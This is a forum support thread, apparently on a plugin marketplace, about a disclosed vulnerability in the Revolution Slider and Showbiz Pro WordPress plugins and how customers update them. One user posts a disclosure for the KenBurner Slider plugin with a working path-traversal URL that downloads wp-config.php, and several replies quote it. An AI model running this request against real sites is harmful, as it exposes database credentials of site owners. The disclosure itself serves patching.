Important: Serious Vulnerability in Revolution Slider & Showbiz Pro (WordPress) Plugins

Thanks for attention. I have doubt how many will understand this minute difference in font :slight_smile: .
Some mark :before , :after link will work nice though.

H?
I got this email but download is not available: http://screencast.com/t/H7aHdw13zIoR

hi i acquired betheme the version 4.2 upgrade is coming including security slider revolution?

Name: WordPress KenBurner Slider Plugin (kbslider)
Tipe: Arbitrary file download
Versions : ALL

http://site/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

http://pastebin.com/u/MF0x_

Credits go to: MF0x and Daniel Pentest

EasyDevelopment said

Name: WordPress KenBurner Slider Plugin (kbslider)
Tipe: Arbitrary file download
Versions : ALL

http://site/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

http://pastebin.com/u/MF0x_

Credits go to: MF0x and Daniel Pentest

the Ken Burner WordPress version was removed from the marketplace.
The WP backend was developed by another author who is not in our team any longer, so we also removed it when he left our company.

If you still happen to use this old plugin, we can provide an upgrade for you on another product instead. In that case please contact us via our profile form: http://codecanyon.net/user/themepunch#contact

Best Regards, ThemePunch

nirushz said

H?
I got this email but download is not available: http://screencast.com/t/H7aHdw13zIoR

Please contact us via our Profile page or per ticket and we will provide you an update.

mferro1984 said

hi i acquired betheme the version 4.2 upgrade is coming including security slider revolution?

Version 4.2 is safe. The last known vulnerability issue was present in version 4.1.4. From 4.1.5 you are safe already. Current version is 4.6.0

CaliGirl001 said

Hi there

I am actioning the email I received about this. The email states to re-download the theme and copy the revslider to overwrite the old one. I did all this and I then checked the plug-in version in WP admin and the version # did not update so is still v2.3.3

It also says to confirm the versions are secure. How do you check this?

If you wish contact us via our profile page or via a ticket at http://themepunch.ticksy.com and we can take a look on your installation and help you with the update if needed.

Thanks a lot,

ThemePunch

themepunch said
EasyDevelopment said

Name: WordPress KenBurner Slider Plugin (kbslider)
Tipe: Arbitrary file download
Versions : ALL

http://site/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

http://pastebin.com/u/MF0x_

Credits go to: MF0x and Daniel Pentest

the Ken Burner WordPress version was removed from the marketplace over a year ago.
The WP backend was developed by another author who is not in our team any longer, so we also removed it when he left our company.

If you still happen to use this old plugin, we can provide an upgrade for you on another product instead. In that case please contact us via our profile form: http://codecanyon.net/user/themepunch#contact

Best Regards, ThemePunch

Thanks for mentioning this, but I’ve just encountered a website with Ken Burner, and people should be aware of this issue also, if they haven’t moved to Slider Revolution already.

EasyDevelopment said
themepunch said
EasyDevelopment said

Name: WordPress KenBurner Slider Plugin (kbslider)
Tipe: Arbitrary file download
Versions : ALL

http://site/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

http://pastebin.com/u/MF0x_

Credits go to: MF0x and Daniel Pentest

the Ken Burner WordPress version was removed from the marketplace over a year ago.
The WP backend was developed by another author who is not in our team any longer, so we also removed it when he left our company.

If you still happen to use this old plugin, we can provide an upgrade for you on another product instead. In that case please contact us via our profile form: http://codecanyon.net/user/themepunch#contact

Best Regards, ThemePunch

Thanks for mentioning this, but I’ve just encountered a website with Ken Burner, and people should be aware of this issue also, if they haven’t moved to Slider Revolution already.

You are of course right, we are already putting together the fixed version, and make it very soon available for anyone. Thanks for the heads up again ! We informed Envato also and asked them to inform all our Customers who purchased the file.

Will post a link here with the fix asap !

ThemePunch

I have followed the advice and downloaded the Delaware theme from my account, unpacked the zip file to find and instal via ftp the rev slider files to the WP RevSlider plugin file, but when I return to my WP dashboard it still shows the RevSlider plugin running version 3.0.7?

joggon said

I have followed the advice and downloaded the Delaware theme from my account, unpacked the zip file to find and instal via ftp the rev slider files to the WP RevSlider plugin file, but when I return to my WP dashboard it still shows the RevSlider plugin running version 3.0.7?

Hi,

please submit a ticket at http://themepunch.ticksy.com with your wp and ftp credentials, and we take a look for you on the issue !

Thanks a lot,

ThemePunch

Hi,

in order to sum up the situation, all corresponding links and plugins from our perspective we have created a dedicated page on our homesite.

http://www.themepunch.com/home/plugin-update-information/



Cheers from your Team @ ThemePunch


  Facebook      Twitter      Support

themepunch said
joggon said

I have followed the advice and downloaded the Delaware theme from my account, unpacked the zip file to find and instal via ftp the rev slider files to the WP RevSlider plugin file, but when I return to my WP dashboard it still shows the RevSlider plugin running version 3.0.7?

Hi,

please submit a ticket at http://themepunch.ticksy.com with your wp and ftp credentials, and we take a look for you on the issue !

Thanks a lot,

ThemePunch

Many thanks, ian

We Hope to fix it soon

thanks :slight_smile:

tansh said

Thanks for attention. I have doubt how many will understand this minute difference in font :slight_smile: .
Some mark :before , :after link will work nice though.

Hi again, I’ve added “(secure)” after the name of each updated theme. Thanks!

I can’t find revslider folder in my download of Goodnews theme, how can I get the updated version? Why it is not downloadable in the Plugins controlpanel page?

pbraconnot said

I can’t find revslider folder in my download of Goodnews theme, how can I get the updated version? Why it is not downloadable in the Plugins controlpanel page?

Please reach out to the author of the theme — they should be able to help :slight_smile:

thanks for this, smart idea:

http://www.themepunch.com/home/punch-guider/